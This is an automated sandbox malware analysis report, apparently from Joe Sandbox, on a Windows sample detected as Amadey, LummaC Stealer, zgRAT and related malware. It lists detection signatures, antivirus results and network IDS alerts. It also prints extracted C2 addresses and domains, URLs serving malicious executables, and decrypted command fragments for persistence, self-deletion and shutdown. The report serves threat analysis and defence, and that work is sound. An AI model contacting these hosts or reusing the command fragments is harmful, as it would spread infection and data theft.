Windows Analysis Report
SUAosT64HD.exe

Overview

General Information

Sample name:	SUAosT64HD.exe renamed because original name is a hash value
Original sample name:	a9f93ec56cea5f5cc39a2462979aaedcc3c0ea49d2cdf211c6aff8bd3c668a79N.exe
Analysis ID:	1651333
MD5:	9a84a7b5cc944be439829ad200cd4bc0
SHA1:	4bef117ca6328405d457ace1a6f14a59e7d4758e
SHA256:	a9f93ec56cea5f5cc39a2462979aaedcc3c0ea49d2cdf211c6aff8bd3c668a79
Infos:

Detection

Amadey, Babadeda, LummaC Stealer, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

Yara detected Babadeda

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected zgRAT

C2 URLs / IPs found in malware configuration

Changes security center settings (notifications, updates, antivirus, firewall)

Contains functionality to start a terminal service

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Sample is not signed and drops a device driver

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious New Service Creation

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Uses cmd line tools excessively to alter registry or file data

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: New Kernel Driver Via SC.EXE

Sigma detected: Suspicious Recursive Takeown

Suricata IDS alerts with low severity for network traffic

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SUAosT64HD.exe

Avira: detected

Antivirus detection for URL or domain

Source: weldorae.digital/geds	Avira URL Cloud: Label: malware
Source: oreheatq.live/gsopp	Avira URL Cloud: Label: malware
Source: steelixr.live/aguiz	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/martin1/martin.zip	Avira URL Cloud: Label: phishing
Source: smeltingt.run/giiaus	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php#w	Avira URL Cloud: Label: malware
Source: castmaxw.run/ganzde	Avira URL Cloud: Label: malware
Source: galarona.bet/GKAns	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/newdef/apple.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/5876083921/Or1ARiR.exe	Avira URL Cloud: Label: phishing
Source: http://176.113.115.7/files/7001656225/Rm3cVPI.exe	Avira URL Cloud: Label: phishing
Source: ferromny.digital/gwpd	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe	Avira: detection malicious, Label: HEUR/AGEN.1361736
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe	Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1361736
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe	Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\ssisd.sys	Avira: detection malicious, Label: HEUR/AGEN.1350862
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["galarona.bet/GKAns", "oreheatq.live/gsopp", "castmaxw.run/ganzde", "weldorae.digital/geds", "steelixr.live/aguiz", "advennture.top/GKsiio", "targett.top/dsANGt", "smeltingt.run/giiaus", "ferromny.digital/gwpd"], "Build id": "d250578b335fbbce73b510aa5accebc066be54418f8bcf75cd"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\22.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\ssisd.sys	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: SUAosT64HD.exe	ReversingLabs: Detection: 73%
Source: SUAosT64HD.exe	Virustotal: Detection: 77%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.5%

Sample uses string decryption to hide its real strings

Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 185.215.113.16
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Jo89Ku7d/index.php
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 44111dbc49
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: axplong.exe
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: http://
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: https://
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: AVAST Software
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Panda Security
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Sophos
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ------
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ComputerName
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: CurrentBuild
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp	String decryptor: random
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: galarona.bet/GKAns
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: oreheatq.live/gsopp
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: castmaxw.run/ganzde
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: weldorae.digital/geds
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: steelixr.live/aguiz
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: advennture.top/GKsiio
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: targett.top/dsANGt
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: smeltingt.run/giiaus
Source: 29.0.Rm3cVPI.exe.980000.0.unpack	String decryptor: ferromny.digital/gwpd

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\22.exe	Unpacked PE file: 16.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe	Unpacked PE file: 19.2.22.exe.400000.0.unpack

Uses 32bit PE files

Source: SUAosT64HD.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000000E.00000003.1923045915.00000000068E1000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000003.1922478872.00000000060EE000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000002.1929624688.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe, 0000000E.00000000.1920430499.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe.11.dr, apple[1].exe.11.dr, 39pazbF[1].exe.11.dr
Source:	Binary string: C:\Users\1231123\Desktop\DDriver\x64\Release\DDriver.pdb source: ssisd.sys.14.dr

Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49717 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49719 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.5:49717
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49721
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49728
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49751
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49759
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49795
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.5:49780
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49802
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49745
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49746
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49720
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49747
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49786
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49779
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49809
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49768
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49773
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49783
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49749
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49792
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49734
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49741
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49754
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49724
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49775
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49750
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49729
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49800
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49787
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49722
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49804
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49807
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49731
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49814
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49730
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49742
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49798
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49727
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49758
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49769
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49752
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49726
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49764
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49790
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49763
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49743
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49776
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49744
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49794
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49760
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49778
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49774
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49816
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49748
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49757
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49766
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49782
Source: Network traffic	Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 176.113.115.7:80 -> 192.168.2.5:49797
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49791
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49765
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49755
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49820
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49777
